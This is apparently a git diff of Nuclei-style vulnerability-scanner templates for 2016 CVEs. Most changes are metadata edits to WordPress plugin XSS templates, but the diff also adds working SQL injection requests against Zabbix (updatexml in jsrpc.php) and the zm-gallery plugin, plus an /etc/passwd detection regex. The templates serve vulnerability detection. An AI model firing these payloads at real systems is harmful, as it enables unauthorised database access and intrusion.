b/cves/2016/CVE-2016-1000128.yaml @@ -8,12 +8,12 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=161 - https://wordpress.org/plugins/anti-plagiarism - tags: cve,cve2016,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000128 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml index fbeb35821b..159bd01e94 100644 --- a/cves/2016/CVE-2016-1000129.yaml +++ b/cves/2016/CVE-2016-1000129.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 + - https://wordpress.org/plugins/defa-online-image-protector + - http://www.vapidlabs.com/wp/wp_advisory.php?v=449 + - http://www.securityfocus.com/bid/93892 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000129 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml index 04c6324c51..00972d2713 100644 --- a/cves/2016/CVE-2016-1000130.yaml +++ b/cves/2016/CVE-2016-1000130.yaml @@ -5,13 +5,16 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin e-search v1.0 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 + - https://wordpress.org/plugins/e-search + - http://www.vapidlabs.com/wp/wp_advisory.php?v=394 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000130 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000131.yaml b/cves/2016/CVE-2016-1000131.yaml index f9e0d4a700..14269d707f 100644 --- a/cves/2016/CVE-2016-1000131.yaml +++ b/cves/2016/CVE-2016-1000131.yaml @@ -4,14 +4,18 @@ info: name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin e-search v1.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=393 + - https://wordpress.org/plugins/e-search + - http://www.securityfocus.com/bid/93867 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000131 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin e-search v1.0" + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml index c33a51fe7a..f8b05ac8dc 100644 --- a/cves/2016/CVE-2016-1000132.yaml +++ b/cves/2016/CVE-2016-1000132.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=37 + - https://wordpress.org/plugins/enhanced-tooltipglossary + - http://www.securityfocus.com/bid/93865 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000132 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml index 64968b022f..154c2e4ebc 100644 --- a/cves/2016/CVE-2016-1000133.yaml +++ b/cves/2016/CVE-2016-1000133.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 + - https://wordpress.org/plugins/forget-about-shortcode-buttons + - http://www.vapidlabs.com/wp/wp_advisory.php?v=602 + - http://www.securityfocus.com/bid/93869 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000133 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml index d11a917306..41b08f9096 100644 --- a/cves/2016/CVE-2016-1000134.yaml +++ b/cves/2016/CVE-2016-1000134.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin hdw-tube v1.2 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=530 + - https://wordpress.org/plugins/hdw-tube + - http://www.securityfocus.com/bid/93868 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000134 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml index 5fbb768196..002bf598be 100644 --- a/cves/2016/CVE-2016-1000135.yaml +++ b/cves/2016/CVE-2016-1000135.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin hdw-tube v1.2 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=533 + - https://wordpress.org/plugins/hdw-tube + - http://www.securityfocus.com/bid/93820 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000135 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000136.yaml b/cves/2016/CVE-2016-1000136.yaml index 3adf484b9b..f6b6733834 100644 --- a/cves/2016/CVE-2016-1000136.yaml +++ b/cves/2016/CVE-2016-1000136.yaml @@ -8,12 +8,13 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=798 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136 - tags: cve,cve2016,wordpress,xss,wp-plugin + - https://wordpress.org/plugins/heat-trackr classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000136 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000137.yaml b/cves/2016/CVE-2016-1000137.yaml index eb4ae2195c..559d5ca9f7 100644 --- a/cves/2016/CVE-2016-1000137.yaml +++ b/cves/2016/CVE-2016-1000137.yaml @@ -4,14 +4,17 @@ info: name: Hero Maps Pro 2.1.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin hero-maps-pro v2.1.0 + reference: + - http://www.vapidlabs.com/wp/wp_advisory.php?v=658 + - https://wordpress.org/plugins/hero-maps-pro + - http://www.securityfocus.com/bid/93815 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000137 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin hero-maps-pro v2.1.0" + tags: cve,cve2016,wordpress,xss,wp-plugin,maps requests: - method: GET diff --git a/cves/2016/CVE-2016-1000138.yaml b/cves/2016/CVE-2016-1000138.yaml index ee73a4ce9f..302b61fa02 100644 --- a/cves/2016/CVE-2016-1000138.yaml +++ b/cves/2016/CVE-2016-1000138.yaml @@ -4,14 +4,17 @@ info: name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin indexisto v1.0.5 + reference: + - http://www.vapidlabs.com/wp/wp_advisory.php?v=38 + - https://wordpress.org/plugins/indexisto + - http://www.securityfocus.com/bid/93816 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000138 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin indexisto v1.0.5" + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000139.yaml b/cves/2016/CVE-2016-1000139.yaml index b3ff2bbb88..c07e1ac6b3 100644 --- a/cves/2016/CVE-2016-1000139.yaml +++ b/cves/2016/CVE-2016-1000139.yaml @@ -4,16 +4,18 @@ info: name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin infusionsoft v1.5.11 reference: - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139 - tags: cve,cve2016,wordpress,wp-plugin,xss + - https://wordpress.org/plugins/infusionsoft + - http://www.vapidlabs.com/wp/wp_advisory.php?v=864 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000139 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin infusionsoft v1.5.11" + tags: cve,cve2016,wordpress,wp-plugin,xss requests: - method: GET diff --git a/cves/2016/CVE-2016-1000140.yaml b/cves/2016/CVE-2016-1000140.yaml index 32a78c7534..0d02c2cf14 100644 --- a/cves/2016/CVE-2016-1000140.yaml +++ b/cves/2016/CVE-2016-1000140.yaml @@ -4,14 +4,18 @@ info: name: New Year Firework <= 1.1.9 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000140 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin new-year-firework v1.1.9 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000140 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=453 + - https://wordpress.org/plugins/new-year-firework + - http://www.securityfocus.com/bid/93817 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000140 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin new-year-firework v1.1.9" + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000141.yaml b/cves/2016/CVE-2016-1000141.yaml index 6450289e6c..6b37cdd77b 100644 --- a/cves/2016/CVE-2016-1000141.yaml +++ b/cves/2016/CVE-2016-1000141.yaml @@ -1,17 +1,21 @@ id: CVE-2016-1000141 info: - name: Page Layout builder v1.9.3 - Reflected Cross-Site Scripting (XSS) + name: WordPress Page Layout builder v1.9.3 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Reflected XSS in wordpress plugin page-layout-builder v1.9.3 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability. + reference: + - http://www.vapidlabs.com/wp/wp_advisory.php?v=358 + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 + - https://wordpress.org/plugins/page-layout-builder + remediation: Upgrade to version 2.0 or higher. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000141 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET @@ -33,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/24 diff --git a/cves/2016/CVE-2016-1000142.yaml b/cves/2016/CVE-2016-1000142.yaml index 2d1df9a78d..adfc312475 100644 --- a/cves/2016/CVE-2016-1000142.yaml +++ b/cves/2016/CVE-2016-1000142.yaml @@ -8,12 +8,14 @@ info: reference: - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc - https://nvd.nist.gov/vuln/detail/CVE-2016-1000142 - tags: cve,cve2016,wordpress,wp-plugin,xss + - http://www.vapidlabs.com/wp/wp_advisory.php?v=435 + - https://wordpress.org/plugins/parsi-font classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000142 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,wp-plugin,xss requests: - method: GET diff --git a/cves/2016/CVE-2016-1000143.yaml b/cves/2016/CVE-2016-1000143.yaml index 65b05e634d..37b57b29af 100644 --- a/cves/2016/CVE-2016-1000143.yaml +++ b/cves/2016/CVE-2016-1000143.yaml @@ -8,12 +8,13 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=780 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143 - tags: cve,cve2016,wordpress,wp-plugin,xss + - https://wordpress.org/plugins/photoxhibit classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000143 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,wp-plugin,xss requests: - method: GET diff --git a/cves/2016/CVE-2016-1000146.yaml b/cves/2016/CVE-2016-1000146.yaml index 4d9e921b14..e5f3bb2231 100644 --- a/cves/2016/CVE-2016-1000146.yaml +++ b/cves/2016/CVE-2016-1000146.yaml @@ -4,14 +4,18 @@ info: name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin pondol-formmail v1.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=787 + - https://wordpress.org/plugins/pondol-formmail + - http://www.securityfocus.com/bid/93584 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000146 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin pondol-formmail v1.1" + tags: cve,cve2016,wordpress,xss,wp-plugin,mail requests: - method: GET diff --git a/cves/2016/CVE-2016-1000148.yaml b/cves/2016/CVE-2016-1000148.yaml index 7340d0b0c2..a397d31ae5 100644 --- a/cves/2016/CVE-2016-1000148.yaml +++ b/cves/2016/CVE-2016-1000148.yaml @@ -4,16 +4,18 @@ info: name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin s3-video v0.983 reference: - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148 - tags: cve,cve2016,wordpress,wp-plugin,xss + - https://wordpress.org/plugins/s3-video + - http://www.vapidlabs.com/wp/wp_advisory.php?v=240 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000148 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin s3-video v0.983" + tags: cve,cve2016,wordpress,wp-plugin,xss requests: - method: GET diff --git a/cves/2016/CVE-2016-1000149.yaml b/cves/2016/CVE-2016-1000149.yaml index 7998ec03d5..f55daff95d 100644 --- a/cves/2016/CVE-2016-1000149.yaml +++ b/cves/2016/CVE-2016-1000149.yaml @@ -4,14 +4,18 @@ info: name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin simpel-reserveren v3.5.2 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 + - https://wordpress.org/plugins/simpel-reserveren + - http://www.vapidlabs.com/wp/wp_advisory.php?v=474 + - http://www.securityfocus.com/bid/93582 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000149 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin simpel-reserveren v3.5.2" + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000152.yaml b/cves/2016/CVE-2016-1000152.yaml index d44cabdaa9..897d14916e 100644 --- a/cves/2016/CVE-2016-1000152.yaml +++ b/cves/2016/CVE-2016-1000152.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin tidio-form v1.0 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=799 + - https://wordpress.org/plugins/tidio-form + - http://www.securityfocus.com/bid/93579 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000152 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000153.yaml b/cves/2016/CVE-2016-1000153.yaml index 8e9ef8b66c..3b55e0bdd3 100644 --- a/cves/2016/CVE-2016-1000153.yaml +++ b/cves/2016/CVE-2016-1000153.yaml @@ -4,14 +4,18 @@ info: name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin tidio-gallery v1.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=427 + - https://wordpress.org/plugins/tidio-gallery + - http://www.securityfocus.com/bid/93543 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000153 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin tidio-gallery v1.1" + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000154.yaml b/cves/2016/CVE-2016-1000154.yaml index dfbff06092..6080409f32 100644 --- a/cves/2016/CVE-2016-1000154.yaml +++ b/cves/2016/CVE-2016-1000154.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin whizz v1.0. - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=112 + - https://wordpress.org/plugins/whizz + - http://www.securityfocus.com/bid/93538 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000154 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-1000155.yaml b/cves/2016/CVE-2016-1000155.yaml index 70f109f44c..bef2178f7b 100644 --- a/cves/2016/CVE-2016-1000155.yaml +++ b/cves/2016/CVE-2016-1000155.yaml @@ -4,14 +4,18 @@ info: name: WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin wpsolr-search-engine v7.6 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 + - https://wordpress.org/plugins/wpsolr-search-engine + - http://www.vapidlabs.com/wp/wp_advisory.php?v=303 + - http://www.securityfocus.com/bid/93536 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000155 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin wpsolr-search-engine v7.6" + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml index ff51ed5643..17b510dc45 100644 --- a/cves/2016/CVE-2016-10033.yaml +++ b/cves/2016/CVE-2016-10033.yaml @@ -1,16 +1,21 @@ id: CVE-2016-10033 + info: - name: Wordpress 4.6 Remote Code Execution + name: WordPress PHPMailer < 5.2.18 Remote Code Execution author: princechaddha severity: critical - description: The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property. - reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html - tags: wordpress,cve,cve2016,rce + description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport. + reference: + - https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html + - https://nvd.nist.gov/vuln/detail/CVE-2016-10033 + - https://www.exploit-db.com/exploits/40970/ + - https://www.exploit-db.com/exploits/40968/ classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2016-10033 cwe-id: CWE-77 + tags: wordpress,cve,cve2016,rce requests: - raw: @@ -47,3 +52,5 @@ requests: - type: status status: - 302 + +# Enhanced by mp on 2022/04/13 diff --git a/cves/2016/CVE-2016-10134.yaml b/cves/2016/CVE-2016-10134.yaml new file mode 100644 index 0000000000..7429102228 --- /dev/null +++ b/cves/2016/CVE-2016-10134.yaml @@ -0,0 +1,38 @@ +id: CVE-2016-10134 + +info: + name: Zabbix - SQL Injection + author: princechaddha + severity: critical + description: Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks. + reference: + - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134 + - https://nvd.nist.gov/vuln/detail/CVE-2016-10134 + - https://support.zabbix.com/browse/ZBX-11023 + - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850936 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2016-10134 + cwe-id: CWE-89 + tags: cve,cve2016,zabbix,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Error in query [INSERT INTO profiles (profileid, userid' + - 'You have an error in your SQL syntax' + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/10 diff --git a/cves/2016/CVE-2016-10924.yaml b/cves/2016/CVE-2016-10924.yaml index b351b79efe..17f56716bd 100644 --- a/cves/2016/CVE-2016-10924.yaml +++ b/cves/2016/CVE-2016-10924.yaml @@ -9,12 +9,13 @@ info: - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c - https://www.exploit-db.com/exploits/39575 - https://nvd.nist.gov/vuln/detail/CVE-2016-10924 - tags: cve,cve2021,wp-plugin,lfi,wordpress,ebook + - https://wordpress.org/plugins/ebook-download/#developers classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2016-10924 cwe-id: CWE-22 + tags: cve,cve2021,wp-plugin,lfi,wordpress,ebook requests: - method: GET diff --git a/cves/2016/CVE-2016-10940.yaml b/cves/2016/CVE-2016-10940.yaml new file mode 100644 index 0000000000..3898a7c31a --- /dev/null +++ b/cves/2016/CVE-2016-10940.yaml @@ -0,0 +1,50 @@ +id: CVE-2016-10940 + +info: + name: WordPress zm-gallery plugin 1.0 SQL Injection + author: cckuailong,daffainfo + severity: high + description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter. + reference: + - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6 + - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ + - https://nvd.nist.gov/vuln/detail/CVE-2016-10940 + - http://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2016-10940 + cwe-id: CWE-89 + tags: cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 + Host: {{Hostname}} + + - | + GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200' + - 'contains(body_2, "[zm_gallery id=")' + - 'contains(body_2, "")' + - '!contains(body_3, "")' + condition: and + +# Enhanced by mp on 2022/04/12 diff --git a/cves/2016/CVE-2016-10956.yaml b/cves/2016/CVE-2016-10956.yaml index e70c75ed3a..25c5fdb2e7 100644 --- a/cves/2016/CVE-2016-10956.yaml +++ b/cves/2016/CVE-2016-10956.yaml @@ -8,12 +8,13 @@ info: reference: - https://cxsecurity.com/issue/WLB-2016080220 - https://wpvulndb.com/vulnerabilities/8609 - tags: cve,cve2016,wordpress,wp-plugin,lfi + - https://wordpress.org/plugins/mail-masta/#developers classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2016-10956 cwe-id: CWE-20 + tags: cve,cve2016,wordpress,wp-plugin,lfi,mail requests: - method: GET @@ -25,8 +26,9 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status status: - 200 + - 500 diff --git a/cves/2016/CVE-2016-10960.yaml 